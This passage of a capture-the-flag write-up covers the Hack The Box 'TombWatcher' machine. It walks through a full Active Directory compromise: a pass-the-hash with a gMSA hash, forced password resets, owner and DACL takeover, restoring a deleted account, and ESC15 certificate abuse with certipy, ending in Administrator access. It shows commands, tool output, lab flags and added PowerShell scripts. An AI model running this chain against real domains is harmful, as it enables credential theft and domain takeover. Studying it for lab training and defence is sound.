msDS-ManagedPassword.B64ENCODED: hTHfon3m4u5bkUTSlOKiTcVGqaIiYqe4SrrDZd8uUEmyGMin8X1qKy6L5ZHVlsvRp17h6l5hC0OqLxYV/WGcmmGom+hqBklNY+MSgPO2r8SUnGniBbV3VR2C6pak3TJxRHd+4yb8iNDsLLgEG/goJ8yVoaaYpQppZWEOtE9EvQLV0nYjWoReut1xHZ1QP/kmHL6hOGrASDo2FIgXRQmEzjyatED/Zdz7s3mfB3OuOWxQUiyd4tic2RFKHEjurhJXN8iuVh0jPJzyWqEiF+5+ZYDckA52ICoIN9JhyAxH3R6Ftqjok3Xc524zjHBiE3Fb7ZMBtNkjobLCxW3976E1yw==
We see it worked and we get the NTLM hash of the user ANSIBLE_DEV$; let's verify it like this:
netexec smb <IP> -u 'ANSIBLE_DEV$' -H 'bf8b11e301f7ba3fdc616e5d4fa01c30' --shares
Info:
SMB 10.10.11.72 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:tombwatcher.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.72 445 DC01 [+] tombwatcher.htb\ANSIBLE_DEV$:bf8b11e301f7ba3fdc616e5d4fa01c30
SMB 10.10.11.72 445 DC01 [*] Enumerated shares
SMB 10.10.11.72 445 DC01 Share Permissions Remark
SMB 10.10.11.72 445 DC01 ----- ----------- ------
SMB 10.10.11.72 445 DC01 ADMIN$ Remote Admin
SMB 10.10.11.72 445 DC01 C$ Default share
SMB 10.10.11.72 445 DC01 IPC$ READ Remote IPC
SMB 10.10.11.72 445 DC01 NETLOGON READ Logon server share
SMB 10.10.11.72 445 DC01 SYSVOL READ Logon server share
We see it works. Now, remember that with this user we have the privileges to change the password of the user sam, so we can do the following:
python3 bloodyAD.py --host '<IP>' -d 'tombwatcher.htb' -u 'ansible_dev$' -p ':bf8b11e301f7ba3fdc616e5d4fa01c30' set password SAM 'P@ssw0rd123!'
Info:
[+] Password changed successfully!
We see it worked, so let's test the credentials like this:
netexec smb <IP> -u 'sam' -p 'P@ssw0rd123!' --shares
Info:
SMB 10.10.11.72 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:tombwatcher.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.72 445 DC01 [+] tombwatcher.htb\sam:P@ssw0rd123!
SMB 10.10.11.72 445 DC01 [*] Enumerated shares
SMB 10.10.11.72 445 DC01 Share Permissions Remark
SMB 10.10.11.72 445 DC01 ----- ----------- ------
SMB 10.10.11.72 445 DC01 ADMIN$ Remote Admin
SMB 10.10.11.72 445 DC01 C$ Default share
SMB 10.10.11.72 445 DC01 IPC$ READ Remote IPC
SMB 10.10.11.72 445 DC01 NETLOGON READ Logon server share
SMB 10.10.11.72 445 DC01 SYSVOL READ Logon server share
We see it works. Remember that we have WriteOwner over the user john, who is the one that can connect remotely via WinRM, so we are going to take advantage of it: with the user sam we grant ourselves full permissions over the john user object, like this:
OwnerEdit
impacket-owneredit -dc-ip <IP> -action write -new-owner sam -target john tombwatcher.htb/sam:P@ssw0rd123!
Info:
/home/kali/Desktop/tombwatcher/bloodyAD/.venv/lib/python3.13/site-packages/impacket/version.py:12: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
import pkg_resources
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Current owner information below
[*] - SID: S-1-5-21-1392491010-1358638721-2126982587-512
[*] - sAMAccountName: Domain Admins
[*] - distinguishedName: CN=Domain Admins,CN=Users,DC=tombwatcher,DC=htb
[*] OwnerSid modified successfully!
DACLEdit
impacket-dacledit -dc-ip <IP> -action write -rights FullControl -principal sam -target john tombwatcher/sam:P@ssw0rd123!
Info:
/home/kali/Desktop/tombwatcher/bloodyAD/.venv/lib/python3.13/site-packages/impacket/version.py:12: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
import pkg_resources
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] DACL backed up to dacledit-20251012-073940.bak
[*] DACL modified successfully!
Now, with all of the above done, we can change john's password, since we have granted ourselves the required privileges.
python3 bloodyAD.py -d 'tombwatcher.htb' -u 'sam' -p 'P@ssw0rd123!' --host <IP> set password 'john' 'JohnPassword123!'
Info:
[+] Password changed successfully!
Evil-winrm
We see it worked; let's try to get in via WinRM like this:
evil-winrm -i <IP> -u john -p 'JohnPassword123!'
Info:
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\john\Documents> whoami
tombwatcher\john
With this we are in, so we read the user flag.
user.txt
01f234e8a41cc2176519e3ff68c229b9
Escalate Privileges
After a while of searching, we try a technique called Tombstone AD, which resembles the name of the HTB machine; first we list the objects or users that are marked as deleted.
Get-ADObject -Filter 'isDeleted -eq $true -and objectClass -eq "user"' -IncludeDeletedObjects
Info:
Deleted : True
DistinguishedName : CN=cert_admin\0ADEL:f80369c8-96a2-4a7f-a56c-9c15edd7d1e3,CN=Deleted Objects,DC=tombwatcher,DC=htb
Name : cert_admin
DEL:f80369c8-96a2-4a7f-a56c-9c15edd7d1e3
ObjectClass : user
ObjectGUID : f80369c8-96a2-4a7f-a56c-9c15edd7d1e3
Deleted : True
DistinguishedName : CN=cert_admin\0ADEL:c1f1f0fe-df9c-494c-bf05-0679e181b358,CN=Deleted Objects,DC=tombwatcher,DC=htb
Name : cert_admin
DEL:c1f1f0fe-df9c-494c-bf05-0679e181b358
ObjectClass : user
ObjectGUID : c1f1f0fe-df9c-494c-bf05-0679e181b358
Deleted : True
DistinguishedName : CN=cert_admin\0ADEL:938182c3-bf0b-410a-9aaa-45c8e1a02ebf,CN=Deleted Objects,DC=tombwatcher,DC=htb
Name : cert_admin
DEL:938182c3-bf0b-410a-9aaa-45c8e1a02ebf
ObjectClass : user
ObjectGUID : 938182c3-bf0b-410a-9aaa-45c8e1a02ebf
We see there is a user called cert_admin, which is quite interesting; let's try to restore that user (the most recently deleted copy).
Get-ADObject -Filter 'sAMAccountName -eq "cert_admin"' -IncludeDeletedObjects | Sort-Object -Property whenDeleted -Descending | Select-Object -First 1 | Restore-ADObject
Now, if we list the users...
net user /domain
Info:
User accounts for \\
-------------------------------------------------------------------------------
Administrator Alfred cert_admin
Guest Henry john
krbtgt sam
The command completed with one or more errors.
cert_admin was restored correctly. Next, set a new password for it:
Set-ADAccountPassword -Identity cert_admin -NewPassword (ConvertTo-SecureString "Password123!" -AsPlainText -Force)
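As an added example (not from the original writeup), the same restoration done deliberately in PowerShell: it checks that the AD Recycle Bin is enabled, lists every deleted copy of the account with its whenChanged timestamp and last known parent, restores the most recently deleted one, resets its password and re-enables it if it was deleted while disabled. It assumes the ActiveDirectory module, an account with rights over the Deleted Objects container and over the restored object, and uses cert_admin / Password123! as placeholders.

```powershell
# Added example, not part of the original writeup. Reanimates a deleted AD user deliberately:
# Recycle Bin check, candidate listing, restore of the chosen copy, password reset.
# Assumes the ActiveDirectory module and an account with rights over the Deleted Objects
# container and the restored object. $Target and $NewPassword are placeholders.
Import-Module ActiveDirectory

$Target      = 'cert_admin'
$NewPassword = 'Password123!'

# 1. Without the Recycle Bin, deleted objects are bare tombstones and Restore-ADObject fails.
$rb = Get-ADOptionalFeature -Identity 'Recycle Bin Feature'
if (-not $rb.EnabledScopes) { throw 'AD Recycle Bin is not enabled; Restore-ADObject will fail.' }

# 2. Enumerate the deleted copies with the attributes needed to tell them apart.
#    whenChanged is updated at deletion time (there is no whenDeleted attribute);
#    lastKnownParent is the OU the object will be restored into by default.
$candidates = Get-ADObject -IncludeDeletedObjects `
    -Filter 'isDeleted -eq $true -and objectClass -eq "user" -and sAMAccountName -eq $Target' `
    -Properties sAMAccountName, whenChanged, lastKnownParent, userAccountControl |
    Sort-Object whenChanged -Descending

$candidates | Format-Table ObjectGUID, whenChanged, lastKnownParent, userAccountControl -AutoSize

# 3. Restore the most recently deleted copy (swap in an explicit GUID to pick another one).
$chosen = $candidates | Select-Object -First 1
if (-not $chosen) { throw "No deleted object named $Target found." }
Restore-ADObject -Identity $chosen.ObjectGUID

# 4. Reset the password and re-enable if needed: a restore keeps the userAccountControl
#    the account had when it was deleted, so a disabled account comes back disabled.
$user = Get-ADUser -Identity $chosen.ObjectGUID
Set-ADAccountPassword -Identity $user -Reset -NewPassword (ConvertTo-SecureString $NewPassword -AsPlainText -Force)
if (-not $user.Enabled) { Enable-ADAccount -Identity $user }
Get-ADUser -Identity $user | Select-Object SamAccountName, Enabled, DistinguishedName
```

Restoring into lastKnownParent matters because the ACLs that let a low-privileged account touch the restored object (and the group memberships it regains) depend on where it lands; a different copy of the same name may have lived in a different OU.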
From a second terminal on the attacking machine, test the new credential:
netexec smb <IP> -u cert_admin -p 'Password123!' --shares
Info:
SMB 10.10.11.72 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:tombwatcher.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.72 445 DC01 [+] tombwatcher.htb\cert_admin:Password123!
SMB 10.10.11.72 445 DC01 [*] Enumerated shares
SMB 10.10.11.72 445 DC01 Share Permissions Remark
SMB 10.10.11.72 445 DC01 ----- ----------- ------
SMB 10.10.11.72 445 DC01 ADMIN$ Remote Admin
SMB 10.10.11.72 445 DC01 C$ Default share
SMB 10.10.11.72 445 DC01 IPC$ READ Remote IPC
SMB 10.10.11.72 445 DC01 NETLOGON READ Logon server share
SMB 10.10.11.72 445 DC01 SYSVOL READ Logon server share
The password change worked (the share listing is what any authenticated user sees; what matters is that the credential is valid). Back in the PowerShell session, dump the certificate template configuration:
certutil -template -v
After a good while digging through that output, this template stands out:
WebServer (Template[31])
Allow Enroll S-1-5-21-1392491010-1358638721-2126982587-1111
Allow Read S-1-5-21-1392491010-1358638721-2126982587-1111
The SID S-1-5-21-1392491010-1358638721-2126982587-1111 is cert_admin's (compare it with the SID attribute of the account), and it matches the ACEs on the WebServer template: cert_admin has Enroll (and Read) on WebServer, so it can request certificates from that template.
Let's verify that with a small script:
Get-ADObject -Filter * -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=tombwatcher,DC=htb" | ForEach-Object {
    # Read the template's DACL through the AD: drive (needs the ActiveDirectory module loaded)
    $acl = Get-ACL "AD:\$($_.DistinguishedName)"
    # Get-Acl resolves the SID to TOMBWATCHER\cert_admin; the "*1111*" clause only matters if resolution fails
    $access = $acl.Access | Where-Object {$_.IdentityReference -like "*1111*" -or $_.IdentityReference -like "*cert_admin*"}
    if ($access) {
        Write-Host "Template: $($_.Name)" -ForegroundColor Green
        $access | Format-Table IdentityReference, ActiveDirectoryRights, AccessControlType
    }
}
Info:
Template: WebServer
IdentityReference ActiveDirectoryRights AccessControlType
----------------- --------------------- -----------------
TOMBWATCHER\cert_admin GenericRead Allow
TOMBWATCHER\cert_admin ReadProperty, WriteProperty, ExtendedRight Allow
That confirms cert_admin has the rights. Before going on, let's also run a tool that automates this enumeration:
certipy-ad find -dc-ip '<IP>' -vulnerable -u 'cert_admin' -p 'Password123!' -stdout
Info:
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Finding issuance policies
[*] Found 13 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'tombwatcher-CA-1' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Successfully retrieved CA configuration for 'tombwatcher-CA-1'
[*] Checking web enrollment for CA 'tombwatcher-CA-1' @ 'DC01.tombwatcher.htb'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[*] Enumeration output:
Certificate Authorities
0
CA Name : tombwatcher-CA-1
DNS Name : DC01.tombwatcher.htb
Certificate Subject : CN=tombwatcher-CA-1, DC=tombwatcher, DC=htb
Certificate Serial Number : 3428A7FC52C310B2460F8440AA8327AC
Certificate Validity Start : 2024-11-16 00:47:48+00:00
Certificate Validity End : 2123-11-16 00:57:48+00:00
Web Enrollment
HTTP
Enabled : False
HTTPS
Enabled : False
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Active Policy : CertificateAuthority_MicrosoftDefault.Policy
Permissions
Owner : TOMBWATCHER.HTB\Administrators
Access Rights
ManageCa : TOMBWATCHER.HTB\Administrators
TOMBWATCHER.HTB\Domain Admins
TOMBWATCHER.HTB\Enterprise Admins
ManageCertificates : TOMBWATCHER.HTB\Administrators
TOMBWATCHER.HTB\Domain Admins
TOMBWATCHER.HTB\Enterprise Admins
Enroll : TOMBWATCHER.HTB\Authenticated Users
Certificate Templates
0
Template Name : WebServer
Display Name : Web Server
Certificate Authorities : tombwatcher-CA-1
Enabled : True
Client Authentication : False
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : True
Certificate Name Flag : EnrolleeSuppliesSubject
Extended Key Usage : Server Authentication
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Schema Version : 1
Validity Period : 2 years
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
Template Created : 2024-11-16T00:57:49+00:00
Template Last Modified : 2024-11-16T17:07:26+00:00
Permissions
Enrollment Permissions
Enrollment Rights : TOMBWATCHER.HTB\Domain Admins
TOMBWATCHER.HTB\Enterprise Admins
TOMBWATCHER.HTB\cert_admin
Object Control Permissions
Owner : TOMBWATCHER.HTB\Enterprise Admins
Full Control Principals : TOMBWATCHER.HTB\Domain Admins
TOMBWATCHER.HTB\Enterprise Admins
Write Owner Principals : TOMBWATCHER.HTB\Domain Admins
TOMBWATCHER.HTB\Enterprise Admins
Write Dacl Principals : TOMBWATCHER.HTB\Domain Admins
TOMBWATCHER.HTB\Enterprise Admins
Write Property Enroll : TOMBWATCHER.HTB\Domain Admins
TOMBWATCHER.HTB\Enterprise Admins
TOMBWATCHER.HTB\cert_admin
[+] User Enrollable Principals : TOMBWATCHER.HTB\cert_admin
[!] Vulnerabilities
ESC15 : Enrollee supplies subject and schema version is 1.
[*] Remarks
ESC15 : Only applicable if the environment has not been patched. See CVE-2024-49019 or the wiki for more details.
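As an added example (not part of the original writeup or of certipy), a PowerShell audit that generalises the ACL check above into the ESC15 conditions certipy flagged: published on a CA, schema version 1, Enrollee Supplies Subject set, no manager approval or signatures required, and Enroll granted to some principal. It reads the Configuration partition with the ActiveDirectory module, which any authenticated domain user can do. Whether the CA itself is patched for CVE-2024-49019 is not visible in LDAP, so treat a hit as a candidate to test, not a confirmed vulnerability. The extended-right GUID and flag values are the standard AD ones.

```powershell
# Added example, not from the original writeup. Lists certificate templates that meet the
# ESC15 preconditions and who can enroll in them. Assumes the ActiveDirectory module and
# read access to the Configuration partition (default for authenticated users).
Import-Module ActiveDirectory

$CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x1      # bit in msPKI-Certificate-Name-Flag
$CT_FLAG_PEND_ALL_REQUESTS         = 0x2      # bit in msPKI-Enrollment-Flag (manager approval)
$RIGHT_ENROLL = [Guid]'0e10c968-78fb-11d2-90d4-00c04f79dc55'   # Certificate-Enrollment extended right
$ADS_RIGHT_DS_CONTROL_ACCESS = 0x100                            # ExtendedRight bit
$ADS_RIGHT_GENERIC_ALL       = 0xF01FF
$EkuNames = @{ '1.3.6.1.5.5.7.3.1' = 'Server Authentication'; '1.3.6.1.5.5.7.3.2' = 'Client Authentication' }

$pks = "CN=Public Key Services,CN=Services,$((Get-ADRootDSE).configurationNamingContext)"

# Only templates published on an enrollment service (CA) can be enrolled in.
$publishedOn = @{}
Get-ADObject -SearchBase "CN=Enrollment Services,$pks" -Filter 'objectClass -eq "pKIEnrollmentService"' -Properties certificateTemplates |
    ForEach-Object { $ca = $_.Name; foreach ($t in $_.certificateTemplates) { $publishedOn[$t] += @($ca) } }

Get-ADObject -SearchBase "CN=Certificate Templates,$pks" -Filter 'objectClass -eq "pKICertificateTemplate"' `
    -Properties 'msPKI-Certificate-Name-Flag', 'msPKI-Template-Schema-Version', 'msPKI-Enrollment-Flag', 'msPKI-RA-Signature', pKIExtendedKeyUsage |
ForEach-Object {
    $tpl = $_
    if (-not $publishedOn.ContainsKey($tpl.Name)) { return }
    $suppliesSubject = ($tpl.'msPKI-Certificate-Name-Flag' -band $CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT) -ne 0
    $needsApproval   = ($tpl.'msPKI-Enrollment-Flag' -band $CT_FLAG_PEND_ALL_REQUESTS) -ne 0
    $needsSignatures = [int]$tpl.'msPKI-RA-Signature' -gt 0
    if (-not $suppliesSubject -or $tpl.'msPKI-Template-Schema-Version' -ne 1 -or $needsApproval -or $needsSignatures) { return }

    # Who can enroll: GenericAll, or the Enroll extended right. An ExtendedRight ACE whose
    # ObjectType is the empty GUID grants every extended right, Enroll included.
    $enrollers = (Get-Acl -Path "AD:\$($tpl.DistinguishedName)").Access |
        Where-Object {
            $_.AccessControlType -eq 'Allow' -and (
                ((([int]$_.ActiveDirectoryRights) -band $ADS_RIGHT_GENERIC_ALL) -eq $ADS_RIGHT_GENERIC_ALL) -or
                (((([int]$_.ActiveDirectoryRights) -band $ADS_RIGHT_DS_CONTROL_ACCESS) -ne 0) -and
                 ($_.ObjectType -eq $RIGHT_ENROLL -or $_.ObjectType -eq [Guid]::Empty))
            )
        } |
        ForEach-Object { $_.IdentityReference.Value } | Sort-Object -Unique

    [pscustomobject]@{
        Template  = $tpl.Name
        CAs       = $publishedOn[$tpl.Name] -join ', '
        EKU       = ($tpl.pKIExtendedKeyUsage | ForEach-Object { if ($EkuNames[$_]) { $EkuNames[$_] } else { $_ } }) -join ', '
        Enrollers = $enrollers -join ', '
    }
}
```

On this domain the output should contain a single row for WebServer with Server Authentication as its EKU and cert_admin among the enrollers, matching what certutil and certipy showed; the same script on a hardened domain ideally prints nothing, because schema version 1 templates with enrollee-supplied subjects should not be published at all.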
Certipy flags the template directly as ESC15 (CVE-2024-49019): a schema version 1 template where the enrollee supplies the subject. On an unpatched CA such a template also lets the requester inject an Application Policies extension through the CSR, so a Client Authentication application policy can be added even though the template's EKU is only Server Authentication, while Enrollee Supplies Subject lets us put any UPN in the SAN. Request a certificate carrying the Administrator UPN:
certipy-ad req -u 'cert_admin@tombwatcher.htb' -p 'Password123!' -dc-ip '<IP>' -target 'DC01.tombwatcher.htb' -ca 'tombwatcher-CA-1' -template 'WebServer' -upn 'administrator@tombwatcher.htb' -application-policies 'Client Authentication'
Info:
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Request ID is 5
[*] Successfully requested certificate
[*] Got certificate with UPN 'administrator@tombwatcher.htb'
[*] Certificate has no object SID
[*] Try using -sid to set the object SID or see the wiki for more details
[*] Saving certificate and private key to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'
This leaves administrator.pfx, a certificate whose SAN UPN is administrator@tombwatcher.htb. Note certipy's warning that the certificate has no object SID extension, and remember that the Client Authentication value lives in the application policies, not in the EKU. A Kerberos PKINIT logon needs the Client Authentication EKU (and, on current DCs, the SID extension), so instead authenticate over LDAPS, where Schannel accepts the application policy; certipy's -ldap-shell option does exactly that:
certipy-ad auth -pfx 'administrator.pfx' -dc-ip '10.10.11.72' -ldap-shell
Info:
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'administrator@tombwatcher.htb'
[*] Connecting to 'ldaps://10.10.11.72:636'
[*] Authenticated to '10.10.11.72' as: 'u:TOMBWATCHER\\Administrator'
Type help for list of commands
# whoami
u:TOMBWATCHER\Administrator
This is only a restricted LDAP shell, so use it to reset the Administrator password (in a real engagement, resetting the built-in Administrator password is loud and disruptive; prefer a less destructive action where possible):
change_password administrator P@ssw0rd!
Info:
Got User DN: CN=Administrator,CN=Users,DC=tombwatcher,DC=htb
Attempting to set new password of: P@ssw0rd!
Password changed successfully!
Now connect over WinRM as Administrator:
evil-winrm -i <IP> -u administrator -p 'P@ssw0rd!'
Info:
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
tombwatcher\administrator
That works: we are Administrator and can read the root flag.
root.txt
502881619329503edc1a0926b2c62e45